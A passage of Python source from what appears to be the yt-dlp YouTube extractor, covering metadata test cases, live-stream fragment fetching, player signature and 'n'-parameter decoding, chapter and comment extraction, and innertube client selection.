'channel': 'SciShow',
'live_status': 'not_live',
'duration': 248,
'categories': ['Education'],
'age_limit': 0,
'channel_follower_count': int
}, 'params': {'format': 'mhtml', 'skip_download': True}
}, {
# Ensure video upload_date is in UTC timezone (video was uploaded 1641170939)
'url': 'https://www.youtube.com/watch?v=2NUZ8W2llS4',
'info_dict': {
'id': '2NUZ8W2llS4',
'ext': 'mp4',
'title': 'The NP that test your phone performance 🙂',
'description': 'md5:144494b24d4f9dfacb97c1bbef5de84d',
'uploader': 'Leon Nguyen',
'uploader_id': 'VNSXIII',
'uploader_url': 'http://www.youtube.com/user/VNSXIII',
'channel_id': 'UCRqNBSOHgilHfAczlUmlWHA',
'channel_url': 'https://www.youtube.com/channel/UCRqNBSOHgilHfAczlUmlWHA',
'duration': 21,
'view_count': int,
'age_limit': 0,
'categories': ['Gaming'],
'tags': 'count:23',
'playable_in_embed': True,
'live_status': 'not_live',
'upload_date': '20220103',
'like_count': int,
'availability': 'public',
'channel': 'Leon Nguyen',
'thumbnail': 'https://i.ytimg.com/vi_webp/2NUZ8W2llS4/maxresdefault.webp',
'channel_follower_count': int
}
}, {
# date text is premiered video, ensure upload date in UTC (published 1641172509)
'url': 'https://www.youtube.com/watch?v=mzZzzBU6lrM',
'info_dict': {
'id': 'mzZzzBU6lrM',
'ext': 'mp4',
'title': 'I Met GeorgeNotFound In Real Life...',
'description': 'md5:cca98a355c7184e750f711f3a1b22c84',
'uploader': 'Quackity',
'uploader_id': 'QuackityHQ',
'uploader_url': 'http://www.youtube.com/user/QuackityHQ',
'channel_id': 'UC_8NknAFiyhOUaZqHR3lq3Q',
'channel_url': 'https://www.youtube.com/channel/UC_8NknAFiyhOUaZqHR3lq3Q',
'duration': 955,
'view_count': int,
'age_limit': 0,
'categories': ['Entertainment'],
'tags': 'count:26',
'playable_in_embed': True,
'live_status': 'not_live',
'release_timestamp': 1641172509,
'release_date': '20220103',
'upload_date': '20220103',
'like_count': int,
'availability': 'public',
'channel': 'Quackity',
'thumbnail': 'https://i.ytimg.com/vi/mzZzzBU6lrM/maxresdefault.jpg',
'channel_follower_count': int
}
},
{ # continuous livestream. Microformat upload date should be preferred.
# Upload date was 2021-06-19 (not UTC), while stream start is 2021-11-27
'url': 'https://www.youtube.com/watch?v=kgx4WGK0oNU',
'info_dict': {
'id': 'kgx4WGK0oNU',
'title': r're:jazz\/lofi hip hop radio🌱chill beats to relax\/study to \[LIVE 24\/7\] \d{4}-\d{2}-\d{2} \d{2}:\d{2}',
'ext': 'mp4',
'channel_id': 'UC84whx2xxsiA1gXHXXqKGOA',
'availability': 'public',
'age_limit': 0,
'release_timestamp': 1637975704,
'upload_date': '20210619',
'channel_url': 'https://www.youtube.com/channel/UC84whx2xxsiA1gXHXXqKGOA',
'live_status': 'is_live',
'thumbnail': 'https://i.ytimg.com/vi/kgx4WGK0oNU/maxresdefault.jpg',
'uploader': '阿鲍Abao',
'uploader_url': 'http://www.youtube.com/channel/UC84whx2xxsiA1gXHXXqKGOA',
'channel': 'Abao in Tokyo',
'channel_follower_count': int,
'release_date': '20211127',
'tags': 'count:39',
'categories': ['People & Blogs'],
'like_count': int,
'uploader_id': 'UC84whx2xxsiA1gXHXXqKGOA',
'view_count': int,
'playable_in_embed': True,
'description': 'md5:2ef1d002cad520f65825346e2084e49d',
},
'params': {'skip_download': True}
},
]
@classmethod
def suitable(cls, url):
from ..utils import parse_qs
qs = parse_qs(url)
if qs.get('list', [None])[0]:
return False
return super(YoutubeIE, cls).suitable(url)
def __init__(self, *args, **kwargs):
super(YoutubeIE, self).__init__(*args, **kwargs)
self._code_cache = {}
self._player_cache = {}
def _prepare_live_from_start_formats(self, formats, video_id, live_start_time, url, webpage_url, smuggled_data):
lock = threading.Lock()
is_live = True
start_time = time.time()
formats = [f for f in formats if f.get('is_from_start')]
def refetch_manifest(format_id, delay):
nonlocal formats, start_time, is_live
if time.time() <= start_time + delay:
return
_, _, prs, player_url = self._download_player_responses(url, smuggled_data, video_id, webpage_url)
video_details = traverse_obj(
prs, (..., 'videoDetails'), expected_type=dict, default=[])
microformats = traverse_obj(
prs, (..., 'microformat', 'playerMicroformatRenderer'),
expected_type=dict, default=[])
_, is_live, _, formats = self._list_formats(video_id, microformats, video_details, prs, player_url)
start_time = time.time()
def mpd_feed(format_id, delay):
"""
@returns (manifest_url, manifest_stream_number, is_live) or None
"""
with lock:
refetch_manifest(format_id, delay)
f = next((f for f in formats if f['format_id'] == format_id), None)
if not f:
if not is_live:
self.to_screen(f'{video_id}: Video is no longer live')
else:
self.report_warning(
f'Cannot find refreshed manifest for format {format_id}{bug_reports_message()}')
return None
return f['manifest_url'], f['manifest_stream_number'], is_live
for f in formats:
f['is_live'] = True
f['protocol'] = 'http_dash_segments_generator'
f['fragments'] = functools.partial(
self._live_dash_fragments, f['format_id'], live_start_time, mpd_feed)
def _live_dash_fragments(self, format_id, live_start_time, mpd_feed, ctx):
FETCH_SPAN, MAX_DURATION = 5, 432000
mpd_url, stream_number, is_live = None, None, True
begin_index = 0
download_start_time = ctx.get('start') or time.time()
lack_early_segments = download_start_time - (live_start_time or download_start_time) > MAX_DURATION
if lack_early_segments:
self.report_warning(bug_reports_message(
'Starting download from the last 120 hours of the live stream since '
'YouTube does not have data before that. If you think this is wrong,'), only_once=True)
lack_early_segments = True
known_idx, no_fragment_score, last_segment_url = begin_index, 0, None
fragments, fragment_base_url = None, None
def _extract_sequence_from_mpd(refresh_sequence, immediate):
nonlocal mpd_url, stream_number, is_live, no_fragment_score, fragments, fragment_base_url
# Obtain from MPD's maximum seq value
old_mpd_url = mpd_url
last_error = ctx.pop('last_error', None)
expire_fast = immediate or last_error and isinstance(last_error, compat_HTTPError) and last_error.code == 403
mpd_url, stream_number, is_live = (mpd_feed(format_id, 5 if expire_fast else 18000)
or (mpd_url, stream_number, False))
if not refresh_sequence:
if expire_fast and not is_live:
return False, last_seq
elif old_mpd_url == mpd_url:
return True, last_seq
try:
fmts, _ = self._extract_mpd_formats_and_subtitles(
mpd_url, None, note=False, errnote=False, fatal=False)
except ExtractorError:
fmts = None
if not fmts:
no_fragment_score += 2
return False, last_seq
fmt_info = next(x for x in fmts if x['manifest_stream_number'] == stream_number)
fragments = fmt_info['fragments']
fragment_base_url = fmt_info['fragment_base_url']
assert fragment_base_url
_last_seq = int(re.search(r'(?:/|^)sq/(\d+)', fragments[-1]['path']).group(1))
return True, _last_seq
while is_live:
fetch_time = time.time()
if no_fragment_score > 30:
return
if last_segment_url:
# Obtain from "X-Head-Seqnum" header value from each segment
try:
urlh = self._request_webpage(
last_segment_url, None, note=False, errnote=False, fatal=False)
except ExtractorError:
urlh = None
last_seq = try_get(urlh, lambda x: int_or_none(x.headers['X-Head-Seqnum']))
if last_seq is None:
no_fragment_score += 2
last_segment_url = None
continue
else:
should_continue, last_seq = _extract_sequence_from_mpd(True, no_fragment_score > 15)
no_fragment_score += 2
if not should_continue:
continue
if known_idx > last_seq:
last_segment_url = None
continue
last_seq += 1
if begin_index < 0 and known_idx < 0:
# skip from the start when it's negative value
known_idx = last_seq + begin_index
if lack_early_segments:
known_idx = max(known_idx, last_seq - int(MAX_DURATION // fragments[-1]['duration']))
try:
for idx in range(known_idx, last_seq):
# do not update sequence here or you'll get skipped some part of it
should_continue, _ = _extract_sequence_from_mpd(False, False)
if not should_continue:
known_idx = idx - 1
raise ExtractorError('breaking out of outer loop')
last_segment_url = urljoin(fragment_base_url, 'sq/%d' % idx)
yield {
'url': last_segment_url,
}
if known_idx == last_seq:
no_fragment_score += 5
else:
no_fragment_score = 0
known_idx = last_seq
except ExtractorError:
continue
time.sleep(max(0, FETCH_SPAN + fetch_time - time.time()))
def _extract_player_url(self, *ytcfgs, webpage=None):
player_url = traverse_obj(
ytcfgs, (..., 'PLAYER_JS_URL'), (..., 'WEB_PLAYER_CONTEXT_CONFIGS', ..., 'jsUrl'),
get_all=False, expected_type=compat_str)
if not player_url:
return
return urljoin('https://www.youtube.com', player_url)
def _download_player_url(self, video_id, fatal=False):
res = self._download_webpage(
'https://www.youtube.com/iframe_api',
note='Downloading iframe API JS', video_id=video_id, fatal=fatal)
if res:
player_version = self._search_regex(
r'player\\?/([0-9a-fA-F]{8})\\?/', res, 'player version', fatal=fatal)
if player_version:
return f'https://www.youtube.com/s/player/{player_version}/player_ias.vflset/en_US/base.js'
def _signature_cache_id(self, example_sig):
""" Return a string representation of a signature """
return '.'.join(compat_str(len(part)) for part in example_sig.split('.'))
@classmethod
def _extract_player_info(cls, player_url):
for player_re in cls._PLAYER_INFO_RE:
id_m = re.search(player_re, player_url)
if id_m:
break
else:
raise ExtractorError('Cannot identify player %r' % player_url)
return id_m.group('id')
def _load_player(self, video_id, player_url, fatal=True):
player_id = self._extract_player_info(player_url)
if player_id not in self._code_cache:
code = self._download_webpage(
player_url, video_id, fatal=fatal,
note='Downloading player ' + player_id,
errnote='Download of %s failed' % player_url)
if code:
self._code_cache[player_id] = code
return self._code_cache.get(player_id)
def _extract_signature_function(self, video_id, player_url, example_sig):
player_id = self._extract_player_info(player_url)
# Read from filesystem cache
func_id = 'js_%s_%s' % (
player_id, self._signature_cache_id(example_sig))
assert os.path.basename(func_id) == func_id
cache_spec = self._downloader.cache.load('youtube-sigfuncs', func_id)
if cache_spec is not None:
return lambda s: ''.join(s[i] for i in cache_spec)
code = self._load_player(video_id, player_url)
if code:
res = self._parse_sig_js(code)
test_string = ''.join(map(compat_chr, range(len(example_sig))))
cache_res = res(test_string)
cache_spec = [ord(c) for c in cache_res]
self._downloader.cache.store('youtube-sigfuncs', func_id, cache_spec)
return res
def _print_sig_code(self, func, example_sig):
if not self.get_param('youtube_print_sig_code'):
return
def gen_sig_code(idxs):
def _genslice(start, end, step):
starts = '' if start == 0 else str(start)
ends = (':%d' % (end + step)) if end + step >= 0 else ':'
steps = '' if step == 1 else (':%d' % step)
return 's[%s%s%s]' % (starts, ends, steps)
step = None
# Quelch pyflakes warnings - start will be set when step is set
start = '(Never used)'
for i, prev in zip(idxs[1:], idxs[:-1]):
if step is not None:
if i - prev == step:
continue
yield _genslice(start, prev, step)
step = None
continue
if i - prev in [-1, 1]:
step = i - prev
start = prev
continue
else:
yield 's[%d]' % prev
if step is None:
yield 's[%d]' % i
else:
yield _genslice(start, i, step)
test_string = ''.join(map(compat_chr, range(len(example_sig))))
cache_res = func(test_string)
cache_spec = [ord(c) for c in cache_res]
expr_code = ' + '.join(gen_sig_code(cache_spec))
signature_id_tuple = '(%s)' % (
', '.join(compat_str(len(p)) for p in example_sig.split('.')))
code = ('if tuple(len(p) for p in s.split(\'.\')) == %s:\n'
' return %s\n') % (signature_id_tuple, expr_code)
self.to_screen('Extracted signature function:\n' + code)
def _parse_sig_js(self, jscode):
funcname = self._search_regex(
(r'\b[cs]\s*&&\s*[adf]\.set\([^,]+\s*,\s*encodeURIComponent\s*\(\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\b[a-zA-Z0-9]+\s*&&\s*[a-zA-Z0-9]+\.set\([^,]+\s*,\s*encodeURIComponent\s*\(\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\bm=(?P<sig>[a-zA-Z0-9$]{2,})\(decodeURIComponent\(h\.s\)\)',
r'\bc&&\(c=(?P<sig>[a-zA-Z0-9$]{2,})\(decodeURIComponent\(c\)\)',
r'(?:\b|[^a-zA-Z0-9$])(?P<sig>[a-zA-Z0-9$]{2,})\s*=\s*function\(\s*a\s*\)\s*{\s*a\s*=\s*a\.split\(\s*""\s*\);[a-zA-Z0-9$]{2}\.[a-zA-Z0-9$]{2}\(a,\d+\)',
r'(?:\b|[^a-zA-Z0-9$])(?P<sig>[a-zA-Z0-9$]{2,})\s*=\s*function\(\s*a\s*\)\s*{\s*a\s*=\s*a\.split\(\s*""\s*\)',
r'(?P<sig>[a-zA-Z0-9$]+)\s*=\s*function\(\s*a\s*\)\s*{\s*a\s*=\s*a\.split\(\s*""\s*\)',
# Obsolete patterns
r'(["\'])signature\1\s*,\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\.sig\|\|(?P<sig>[a-zA-Z0-9$]+)\(',
r'yt\.akamaized\.net/\)\s*\|\|\s*.*?\s*[cs]\s*&&\s*[adf]\.set\([^,]+\s*,\s*(?:encodeURIComponent\s*\()?\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\b[cs]\s*&&\s*[adf]\.set\([^,]+\s*,\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\b[a-zA-Z0-9]+\s*&&\s*[a-zA-Z0-9]+\.set\([^,]+\s*,\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\bc\s*&&\s*a\.set\([^,]+\s*,\s*\([^)]*\)\s*\(\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\bc\s*&&\s*[a-zA-Z0-9]+\.set\([^,]+\s*,\s*\([^)]*\)\s*\(\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\bc\s*&&\s*[a-zA-Z0-9]+\.set\([^,]+\s*,\s*\([^)]*\)\s*\(\s*(?P<sig>[a-zA-Z0-9$]+)\('),
jscode, 'Initial JS player signature function name', group='sig')
jsi = JSInterpreter(jscode)
initial_function = jsi.extract_function(funcname)
return lambda s: initial_function([s])
def _decrypt_signature(self, s, video_id, player_url):
"""Turn the encrypted s field into a working signature"""
if player_url is None:
raise ExtractorError('Cannot decrypt signature without player_url')
try:
player_id = (player_url, self._signature_cache_id(s))
if player_id not in self._player_cache:
func = self._extract_signature_function(
video_id, player_url, s
)
self._player_cache[player_id] = func
func = self._player_cache[player_id]
self._print_sig_code(func, s)
return func(s)
except Exception as e:
raise ExtractorError('Signature extraction failed: ' + traceback.format_exc(), cause=e)
def _decrypt_nsig(self, s, video_id, player_url):
"""Turn the encrypted n field into a working signature"""
if player_url is None:
raise ExtractorError('Cannot decrypt nsig without player_url')
player_url = urljoin('https://www.youtube.com', player_url)
sig_id = ('nsig_value', s)
if sig_id in self._player_cache:
return self._player_cache[sig_id]
try:
player_id = ('nsig', player_url)
if player_id not in self._player_cache:
self._player_cache[player_id] = self._extract_n_function(video_id, player_url)
func = self._player_cache[player_id]
self._player_cache[sig_id] = func(s)
self.write_debug(f'Decrypted nsig {s} => {self._player_cache[sig_id]}')
return self._player_cache[sig_id]
except Exception as e:
raise ExtractorError(traceback.format_exc(), cause=e, video_id=video_id)
def _extract_n_function_name(self, jscode):
nfunc, idx = self._search_regex(
r'\.get\("n"\)\)&&\(b=(?P<nfunc>[a-zA-Z0-9$]+)(?:\[(?P<idx>\d+)\])?\([a-zA-Z0-9]\)',
jscode, 'Initial JS player n function name', group=('nfunc', 'idx'))
if not idx:
return nfunc
return json.loads(js_to_json(self._search_regex(
rf'var {re.escape(nfunc)}\s*=\s*(\[.+?\]);', jscode,
f'Initial JS player n function list ({nfunc}.{idx})')))[int(idx)]
def _extract_n_function(self, video_id, player_url):
player_id = self._extract_player_info(player_url)
func_code = self._downloader.cache.load('youtube-nsig', player_id)
if func_code:
jsi = JSInterpreter(func_code)
else:
jscode = self._load_player(video_id, player_url)
funcname = self._extract_n_function_name(jscode)
jsi = JSInterpreter(jscode)
func_code = jsi.extract_function_code(funcname)
self._downloader.cache.store('youtube-nsig', player_id, func_code)
if self.get_param('youtube_print_sig_code'):
self.to_screen(f'Extracted nsig function from {player_id}:\n{func_code[1]}\n')
return lambda s: jsi.extract_function_from_code(*func_code)([s])
def _extract_signature_timestamp(self, video_id, player_url, ytcfg=None, fatal=False):
"""
Extract signatureTimestamp (sts)
Required to tell API what sig/player version is in use.
"""
sts = None
if isinstance(ytcfg, dict):
sts = int_or_none(ytcfg.get('STS'))
if not sts:
# Attempt to extract from player
if player_url is None:
error_msg = 'Cannot extract signature timestamp without player_url.'
if fatal:
raise ExtractorError(error_msg)
self.report_warning(error_msg)
return
code = self._load_player(video_id, player_url, fatal=fatal)
if code:
sts = int_or_none(self._search_regex(
r'(?:signatureTimestamp|sts)\s*:\s*(?P<sts>[0-9]{5})', code,
'JS player signature timestamp', group='sts', fatal=fatal))
return sts
def _mark_watched(self, video_id, player_responses):
playback_url = get_first(
player_responses, ('playbackTracking', 'videostatsPlaybackUrl', 'baseUrl'),
expected_type=url_or_none)
if not playback_url:
self.report_warning('Unable to mark watched')
return
parsed_playback_url = compat_urlparse.urlparse(playback_url)
qs = compat_urlparse.parse_qs(parsed_playback_url.query)
# cpn generation algorithm is reverse engineered from base.js.
# In fact it works even with dummy cpn.
CPN_ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_'
cpn = ''.join((CPN_ALPHABET[random.randint(0, 256) & 63] for _ in range(0, 16)))
qs.update({
'ver': ['2'],
'cpn': [cpn],
})
playback_url = compat_urlparse.urlunparse(
parsed_playback_url._replace(query=compat_urllib_parse_urlencode(qs, True)))
self._download_webpage(
playback_url, video_id, 'Marking watched',
'Unable to mark watched', fatal=False)
@staticmethod
def _extract_urls(webpage):
# Embedded YouTube player
entries = [
unescapeHTML(mobj.group('url'))
for mobj in re.finditer(r'''(?x)
(?:
<iframe[^>]+?src=|
data-video-url=|
<embed[^>]+?src=|
embedSWF\(?:\s*|
<object[^>]+data=|
new\s+SWFObject\(
)
(["\'])
(?P<url>(?:https?:)?//(?:www\.)?youtube(?:-nocookie)?\.com/
(?:embed|v|p)/[0-9A-Za-z_-]{11}.*?)
\1''', webpage)]
# lazyYT YouTube embed
entries.extend(list(map(
unescapeHTML,
re.findall(r'class="lazyYT" data-youtube-id="([^"]+)"', webpage))))
# Wordpress "YouTube Video Importer" plugin
matches = re.findall(r'''(?x)<div[^>]+
class=(?P<q1>[\'"])[^\'"]*\byvii_single_video_player\b[^\'"]*(?P=q1)[^>]+
data-video_id=(?P<q2>[\'"])([^\'"]+)(?P=q2)''', webpage)
entries.extend(m[-1] for m in matches)
return entries
@staticmethod
def _extract_url(webpage):
urls = YoutubeIE._extract_urls(webpage)
return urls[0] if urls else None
@classmethod
def extract_id(cls, url):
mobj = re.match(cls._VALID_URL, url, re.VERBOSE)
if mobj is None:
raise ExtractorError('Invalid URL: %s' % url)
return mobj.group('id')
def _extract_chapters_from_json(self, data, duration):
chapter_list = traverse_obj(
data, (
'playerOverlays', 'playerOverlayRenderer', 'decoratedPlayerBarRenderer',
'decoratedPlayerBarRenderer', 'playerBar', 'chapteredPlayerBarRenderer', 'chapters'
), expected_type=list)
return self._extract_chapters(
chapter_list,
chapter_time=lambda chapter: float_or_none(
traverse_obj(chapter, ('chapterRenderer', 'timeRangeStartMillis')), scale=1000),
chapter_title=lambda chapter: traverse_obj(
chapter, ('chapterRenderer', 'title', 'simpleText'), expected_type=str),
duration=duration)
def _extract_chapters_from_engagement_panel(self, data, duration):
content_list = traverse_obj(
data,
('engagementPanels', ..., 'engagementPanelSectionListRenderer', 'content', 'macroMarkersListRenderer', 'contents'),
expected_type=list, default=[])
chapter_time = lambda chapter: parse_duration(self._get_text(chapter, 'timeDescription'))
chapter_title = lambda chapter: self._get_text(chapter, 'title')
return next((
filter(None, (
self._extract_chapters(
traverse_obj(contents, (..., 'macroMarkersListItemRenderer')),
chapter_time, chapter_title, duration)
for contents in content_list
))), [])
def _extract_chapters(self, chapter_list, chapter_time, chapter_title, duration):
chapters = []
last_chapter = {'start_time': 0}
for idx, chapter in enumerate(chapter_list or []):
title = chapter_title(chapter)
start_time = chapter_time(chapter)
if start_time is None:
continue
last_chapter['end_time'] = start_time
if start_time < last_chapter['start_time']:
if idx == 1:
chapters.pop()
self.report_warning('Invalid start time for chapter "%s"' % last_chapter['title'])
else:
self.report_warning(f'Invalid start time for chapter "{title}"')
continue
last_chapter = {'start_time': start_time, 'title': title}
chapters.append(last_chapter)
last_chapter['end_time'] = duration
return chapters
def _extract_yt_initial_variable(self, webpage, regex, video_id, name):
return self._parse_json(self._search_regex(
(r'%s\s*%s' % (regex, self._YT_INITIAL_BOUNDARY_RE),
regex), webpage, name, default='{}'), video_id, fatal=False)
def _extract_comment(self, comment_renderer, parent=None):
comment_id = comment_renderer.get('commentId')
if not comment_id:
return
text = self._get_text(comment_renderer, 'contentText')
# note: timestamp is an estimate calculated from the current time and time_text
timestamp, time_text = self._extract_time_text(comment_renderer, 'publishedTimeText')
author = self._get_text(comment_renderer, 'authorText')
author_id = try_get(comment_renderer,
lambda x: x['authorEndpoint']['browseEndpoint']['browseId'], compat_str)
votes = parse_count(try_get(comment_renderer, (lambda x: x['voteCount']['simpleText'],
lambda x: x['likeCount']), compat_str)) or 0
author_thumbnail = try_get(comment_renderer,
lambda x: x['authorThumbnail']['thumbnails'][-1]['url'], compat_str)
author_is_uploader = try_get(comment_renderer, lambda x: x['authorIsChannelOwner'], bool)
is_favorited = 'creatorHeart' in (try_get(
comment_renderer, lambda x: x['actionButtons']['commentActionButtonsRenderer'], dict) or {})
return {
'id': comment_id,
'text': text,
'timestamp': timestamp,
'time_text': time_text,
'like_count': votes,
'is_favorited': is_favorited,
'author': author,
'author_id': author_id,
'author_thumbnail': author_thumbnail,
'author_is_uploader': author_is_uploader,
'parent': parent or 'root'
}
def _comment_entries(self, root_continuation_data, ytcfg, video_id, parent=None, tracker=None):
get_single_config_arg = lambda c: self._configuration_arg(c, [''])[0]
def extract_header(contents):
_continuation = None
for content in contents:
comments_header_renderer = traverse_obj(content, 'commentsHeaderRenderer')
expected_comment_count = self._get_count(
comments_header_renderer, 'countText', 'commentsCount')
if expected_comment_count:
tracker['est_total'] = expected_comment_count
self.to_screen(f'Downloading ~{expected_comment_count} comments')
comment_sort_index = int(get_single_config_arg('comment_sort') != 'top') # 1 = new, 0 = top
sort_menu_item = try_get(
comments_header_renderer,
lambda x: x['sortMenu']['sortFilterSubMenuRenderer']['subMenuItems'][comment_sort_index], dict) or {}
sort_continuation_ep = sort_menu_item.get('serviceEndpoint') or {}
_continuation = self._extract_continuation_ep_data(sort_continuation_ep) or self._extract_continuation(sort_menu_item)
if not _continuation:
continue
sort_text = str_or_none(sort_menu_item.get('title'))
if not sort_text:
sort_text = 'top comments' if comment_sort_index == 0 else 'newest first'
self.to_screen('Sorting comments by %s' % sort_text.lower())
break
return _continuation
def extract_thread(contents):
if not parent:
tracker['current_page_thread'] = 0
for content in contents:
if not parent and tracker['total_parent_comments'] >= max_parents:
yield
comment_thread_renderer = try_get(content, lambda x: x['commentThreadRenderer'])
comment_renderer = get_first(
(comment_thread_renderer, content), [['commentRenderer', ('comment', 'commentRenderer')]],
expected_type=dict, default={})
comment = self._extract_comment(comment_renderer, parent)
if not comment:
continue
tracker['running_total'] += 1
tracker['total_reply_comments' if parent else 'total_parent_comments'] += 1
yield comment
# Attempt to get the replies
comment_replies_renderer = try_get(
comment_thread_renderer, lambda x: x['replies']['commentRepliesRenderer'], dict)
if comment_replies_renderer:
tracker['current_page_thread'] += 1
comment_entries_iter = self._comment_entries(
comment_replies_renderer, ytcfg, video_id,
parent=comment.get('id'), tracker=tracker)
for reply_comment in itertools.islice(comment_entries_iter, min(max_replies_per_thread, max(0, max_replies - tracker['total_reply_comments']))):
yield reply_comment
# Keeps track of counts across recursive calls
if not tracker:
tracker = dict(
running_total=0,
est_total=0,
current_page_thread=0,
total_parent_comments=0,
total_reply_comments=0)
# TODO: Deprecated
# YouTube comments have a max depth of 2
max_depth = int_or_none(get_single_config_arg('max_comment_depth'))
if max_depth:
self._downloader.deprecation_warning(
'[youtube] max_comment_depth extractor argument is deprecated. Set max replies in the max-comments extractor argument instead.')
if max_depth == 1 and parent:
return
max_comments, max_parents, max_replies, max_replies_per_thread, *_ = map(
lambda p: int_or_none(p, default=sys.maxsize), self._configuration_arg('max_comments', ) + [''] * 4)
continuation = self._extract_continuation(root_continuation_data)
message = self._get_text(root_continuation_data, ('contents', ..., 'messageRenderer', 'text'), max_runs=1)
if message and not parent:
self.report_warning(message, video_id=video_id)
response = None
is_first_continuation = parent is None
for page_num in itertools.count(0):
if not continuation:
break
headers = self.generate_api_headers(ytcfg=ytcfg, visitor_data=self._extract_visitor_data(response))
comment_prog_str = f"({tracker["running_total"]}/{tracker["est_total"]})"
if page_num == 0:
if is_first_continuation:
note_prefix = 'Downloading comment section API JSON'
else:
note_prefix = ' Downloading comment API JSON reply thread %d %s' % (
tracker['current_page_thread'], comment_prog_str)
else:
note_prefix = '%sDownloading comment%s API JSON page %d %s' % (
' ' if parent else '', ' replies' if parent else '',
page_num, comment_prog_str)
response = self._extract_response(
item_id=None, query=continuation,
ep='next', ytcfg=ytcfg, headers=headers, note=note_prefix,
check_get_keys='onResponseReceivedEndpoints')
continuation_contents = traverse_obj(
response, 'onResponseReceivedEndpoints', expected_type=list, default=[])
continuation = None
for continuation_section in continuation_contents:
continuation_items = traverse_obj(
continuation_section,
(('reloadContinuationItemsCommand', 'appendContinuationItemsAction'), 'continuationItems'),
get_all=False, expected_type=list) or []
if is_first_continuation:
continuation = extract_header(continuation_items)
is_first_continuation = False
if continuation:
break
continue
for entry in extract_thread(continuation_items):
if not entry:
return
yield entry
continuation = self._extract_continuation({'contents': continuation_items})
if continuation:
break
def _get_comments(self, ytcfg, video_id, contents, webpage):
"""Entry for comment extraction"""
def _real_comment_extract(contents):
renderer = next((
item for item in traverse_obj(contents, (..., 'itemSectionRenderer'), default={})
if item.get('sectionIdentifier') == 'comment-item-section'), None)
yield from self._comment_entries(renderer, ytcfg, video_id)
max_comments = int_or_none(self._configuration_arg('max_comments', [''])[0])
return itertools.islice(_real_comment_extract(contents), 0, max_comments)
@staticmethod
def _get_checkok_params():
return {'contentCheckOk': True, 'racyCheckOk': True}
@classmethod
def _generate_player_context(cls, sts=None):
context = {
'html5Preference': 'HTML5_PREF_WANTS',
}
if sts is not None:
context['signatureTimestamp'] = sts
return {
'playbackContext': {
'contentPlaybackContext': context
},
**cls._get_checkok_params()
}
@staticmethod
def _is_agegated(player_response):
if traverse_obj(player_response, ('playabilityStatus', 'desktopLegacyAgeGateReason')):
return True
reasons = traverse_obj(player_response, ('playabilityStatus', ('status', 'reason')), default=[])
AGE_GATE_REASONS = (
'confirm your age', 'age-restricted', 'inappropriate', # reason
'age_verification_required', 'age_check_required', # status
)
return any(expected in reason for expected in AGE_GATE_REASONS for reason in reasons)
@staticmethod
def _is_unplayable(player_response):
return traverse_obj(player_response, ('playabilityStatus', 'status')) == 'UNPLAYABLE'
def _extract_player_response(self, client, video_id, master_ytcfg, player_ytcfg, player_url, initial_pr):
session_index = self._extract_session_index(player_ytcfg, master_ytcfg)
syncid = self._extract_account_syncid(player_ytcfg, master_ytcfg, initial_pr)
sts = self._extract_signature_timestamp(video_id, player_url, master_ytcfg, fatal=False) if player_url else None
headers = self.generate_api_headers(
ytcfg=player_ytcfg, account_syncid=syncid, session_index=session_index, default_client=client)
yt_query = {'videoId': video_id}
yt_query.update(self._generate_player_context(sts))
return self._extract_response(
item_id=video_id, ep='player', query=yt_query,
ytcfg=player_ytcfg, headers=headers, fatal=True,
default_client=client,
note='Downloading %s player API JSON' % client.replace('_', ' ').strip()
) or None
def _get_requested_clients(self, url, smuggled_data):
requested_clients = []
default = ['android', 'web']
allowed_clients = sorted(
[client for client in INNERTUBE_CLIENTS.keys() if client[:1] != '_'],
key=lambda client: INNERTUBE_CLIENTS[client]['priority'], reverse=True)
for client in self._configuration_arg('player_client'):
if client in allowed_clients:
requested_clients.append(client)
elif client == 'default':
requested_clients.extend(default)
elif client == 'all':
requested_clients.extend(allowed_clients)
else:
self.report_warning(f'Skipping unsupported client {client}')
if not requested_clients:
requested_clients = default
if smuggled_data.get('is_music_url') or self.is_music_url(url):
requested_clients.extend(
f'{client}_music' for client in requested_clients if f'{client}_music' in INNERTUBE_CLIENTS)
return orderedSet(requested_clients)
def _extract_player_ytcfg(self, client, video_id):
url = {
'web_music': 'https://music.youtube.com',
'web_embedded': f'https://www.youtube.com/embed/{video_id}?html5=1'
}.get(client)
if not url:
return {}
webpage = self._download_webpage(url, video_id, fatal=False, note='Downloading %s config' % client.replace('_', ' ').strip())
return self.extract_ytcfg(video_id, webpage) or {}
def _extract_player_responses(self, clients, video_id, webpage, master_ytcfg):
initial_pr = None
if webpage:
initial_pr = self._extract_yt_initial_variable(
webpage, self._YT_INITIAL_PLAYER_RESPONSE_RE,
video_id, 'initial player response')
all_clients = set(clients)
clients = clients[::-1]
prs = []
def append_client(*client_names):
""" Append the first client name that exists but not already used """
for client_name in client_names:
actual_client = _split_innertube_client(client_name)[0]
if actual_client in INNERTUBE_CLIENTS:
if actual_client not in all_clients:
clients.append(client_name)
all_clients.add(actual_client)
return
# Android player_response does not have microFormats which are needed for
# extraction of some data. So we return the initial_pr with formats
# stripped out even if not requested by the user
# See: https://github.com/yt-dlp/yt-dlp/issues/501
if initial_pr:
pr = dict(initial_pr)
pr['streamingData'] = None
prs.append(pr)
last_error = None
tried_iframe_fallback = False
player_url = None
while clients:
client, base_client, variant = _split_innertube_client(clients.pop())
player_ytcfg = master_ytcfg if client == 'web' else {}
if 'configs' not in self._configuration_arg('player_skip'):
player_ytcfg = self._extract_player_ytcfg(client, video_id) or player_ytcfg
player_url = player_url or self._extract_player_url(master_ytcfg, player_ytcfg, webpage=webpage)
require_js_player = self._get_default_ytcfg(client).get('REQUIRE_JS_PLAYER')
if 'js' in self._configuration_arg('player_skip'):
require_js_player = False
player_url = None
if not player_url and not tried_iframe_fallback and require_js_player:
player_url = self._download_player_url(video_id)
tried_iframe_fallback = True
try:
pr = initial_pr if client == 'web' and initial_pr else self._extract_player_response(
client, video_id, player_ytcfg or master_ytcfg, player_ytcfg, player_url if require_js_player else None, initial_pr)
except ExtractorError as e:
if last_error:
self.report_warning(last_error)
last_error = e
continue
if pr:
prs.append(pr)
